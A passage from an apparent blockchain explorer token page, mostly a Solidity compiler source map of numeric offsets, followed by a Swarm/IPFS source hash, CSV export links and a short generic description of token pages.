;;;5564:79;;:::i;:::-;5526:119;5684:1;5709:53;5754:7;5745:6;5734:9;5730:22;5709:53;:::i;:::-;5699:63;;5655:117;5811:2;5837:53;5882:7;5873:6;5862:9;5858:22;5837:53;:::i;:::-;5827:63;;5782:118;5433:474;;;;;:::o;5913:180::-;5961:77;5958:1;5951:88;6058:4;6055:1;6048:15;6082:4;6079:1;6072:15;6099:320;6143:6;6180:1;6174:4;6170:12;6160:22;;6227:1;6221:4;6217:12;6248:18;6238:81;;6304:4;6296:6;6292:17;6282:27;;6238:81;6366:2;6358:6;6355:14;6335:18;6332:38;6329:84;;6385:18;;:::i;:::-;6329:84;6150:269;6099:320;;;:::o;6425:228::-;6565:34;6561:1;6553:6;6549:14;6542:58;6634:11;6629:2;6621:6;6617:15;6610:36;6425:228;:::o;6659:366::-;6801:3;6822:67;6886:2;6881:3;6822:67;:::i;:::-;6815:74;;6898:93;6987:3;6898:93;:::i;:::-;7016:2;7011:3;7007:12;7000:19;;6659:366;;;:::o;7031:419::-;7197:4;7235:2;7224:9;7220:18;7212:26;;7284:9;7278:4;7274:20;7270:1;7259:9;7255:17;7248:47;7312:131;7438:4;7312:131;:::i;:::-;7304:139;;7031:419;;;:::o;7456:115::-;7531:7;7560:5;7549:16;;7456:115;;;:::o;7577:60::-;7605:3;7626:5;7619:12;;7577:60;;;:::o;7643:218::-;7731:9;7764:91;7782:72;7791:62;7847:5;7791:62;:::i;:::-;7782:72;:::i;:::-;7764:91;:::i;:::-;7751:104;;7643:218;;;:::o;7867:207::-;7992:75;8061:5;7992:75;:::i;:::-;7987:3;7980:88;7867:207;;:::o;8080:298::-;8211:4;8249:2;8238:9;8234:18;8226:26;;8262:109;8368:1;8357:9;8353:17;8344:6;8262:109;:::i;:::-;8080:298;;;;:::o;8384:85::-;8429:7;8458:5;8447:16;;8384:85;;;:::o;8475:158::-;8533:9;8566:61;8584:42;8593:32;8619:5;8593:32;:::i;:::-;8584:42;:::i;:::-;8566:61;:::i;:::-;8553:74;;8475:158;;;:::o;8639:147::-;8734:45;8773:5;8734:45;:::i;:::-;8729:3;8722:58;8639:147;;:::o;8792:238::-;8893:4;8931:2;8920:9;8916:18;8908:26;;8944:79;9020:1;9009:9;9005:17;8996:6;8944:79;:::i;:::-;8792:238;;;;:::o;9036:234::-;9176:34;9172:1;9164:6;9160:14;9153:58;9245:17;9240:2;9232:6;9228:15;9221:42;9036:234;:::o;9276:366::-;9418:3;9439:67;9503:2;9498:3;9439:67;:::i;:::-;9432:74;;9515:93;9604:3;9515:93;:::i;:::-;9633:2;9628:3;9624:12;9617:19;;9276:366;;;:::o;9648:419::-;9814:4;9852:2;9841:9;9837:18;9829:26;;9901:9;9895:4;9891:20;9887:1;9876:9;9872:17;9865:47;9929:131;10055:4;9929:131;:::i;:::-;9921:139;;9648:419;;;:::o;10073:234::-;10213:34;10209:1;10201:6;10197:14;10190:58;10282:17;10277:2;10269:6;10265:15;10258:42;10073:234;:::o;10313:366::-;10455:3;10476:67;10540:2;10535:3;10476:67;:::i;:::-;10469:74;;10552:93;10641:3;10552:93;:::i;:::-;10670:2;10665:3;10661:12;10654:19;;10313:366;;;:::o;10685:419::-;10851:4;10889:2;10878:9;10874:18;10866:26;;10938:9;10932:4;10928:20;10924:1;10913:9;10909:17;10902:47;10966:131;11092:4;10966:131;:::i;:::-;10958:139;;10685:419;;;:::o;11110:232::-;11250:34;11246:1;11238:6;11234:14;11227:58;11319:15;11314:2;11306:6;11302:15;11295:40;11110:232;:::o;11348:366::-;11490:3;11511:67;11575:2;11570:3;11511:67;:::i;:::-;11504:74;;11587:93;11676:3;11587:93;:::i;:::-;11705:2;11700:3;11696:12;11689:19;;11348:366;;;:::o;11720:419::-;11886:4;11924:2;11913:9;11909:18;11901:26;;11973:9;11967:4;11963:20;11959:1;11948:9;11944:17;11937:47;12001:131;12127:4;12001:131;:::i;:::-;11993:139;;11720:419;;;:::o;12145:235::-;12285:34;12281:1;12273:6;12269:14;12262:58;12354:18;12349:2;12341:6;12337:15;12330:43;12145:235;:::o;12386:366::-;12528:3;12549:67;12613:2;12608:3;12549:67;:::i;:::-;12542:74;;12625:93;12714:3;12625:93;:::i;:::-;12743:2;12738:3;12734:12;12727:19;;12386:366;;;:::o;12758:419::-;12924:4;12962:2;12951:9;12947:18;12939:26;;13011:9;13005:4;13001:20;12997:1;12986:9;12982:17;12975:47;13039:131;13165:4;13039:131;:::i;:::-;13031:139;;12758:419;;;:::o;13183:233::-;13323:34;13319:1;13311:6;13307:14;13300:58;13392:16;13387:2;13379:6;13375:15;13368:41;13183:233;:::o;13422:366::-;13564:3;13585:67;13649:2;13644:3;13585:67;:::i;:::-;13578:74;;13661:93;13750:3;13661:93;:::i;:::-;13779:2;13774:3;13770:12;13763:19;;13422:366;;;:::o;13794:419::-;13960:4;13998:2;13987:9;13983:18;13975:26;;14047:9;14041:4;14037:20;14033:1;14022:9;14018:17;14011:47;14075:131;14201:4;14075:131;:::i;:::-;14067:139;;13794:419;;;:::o;14219:180::-;14267:77;14264:1;14257:88;14364:4;14361:1;14354:15;14388:4;14385:1;14378:15;14405:194;14445:4;14465:20;14483:1;14465:20;:::i;:::-;14460:25;;14499:20;14517:1;14499:20;:::i;:::-;14494:25;;14543:1;14540;14536:9;14528:17;;14567:1;14561:4;14558:11;14555:37;;;14572:18;;:::i;:::-;14555:37;14405:194;;;;:::o;14605:191::-;14645:3;14664:20;14682:1;14664:20;:::i;:::-;14659:25;;14698:20;14716:1;14698:20;:::i;:::-;14693:25;;14741:1;14738;14734:9;14727:16;;14762:3;14759:1;14756:10;14753:36;;;14769:18;;:::i;:::-;14753:36;14605:191;;;;:::o;14802:180::-;14942:32;14938:1;14930:6;14926:14;14919:56;14802:180;:::o;14988:366::-;15130:3;15151:67;15215:2;15210:3;15151:67;:::i;:::-;15144:74;;15227:93;15316:3;15227:93;:::i;:::-;15345:2;15340:3;15336:12;15329:19;;14988:366;;;:::o;15360:419::-;15526:4;15564:2;15553:9;15549:18;15541:26;;15613:9;15607:4;15603:20;15599:1;15588:9;15584:17;15577:47;15641:131;15767:4;15641:131;:::i;:::-;15633:139;;15360:419;;;:::o

Swarm Source

ipfs://64e064ff1f339e4af3cbbca85c1974676b1a57a591eee7eb413e4947d30274e0
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.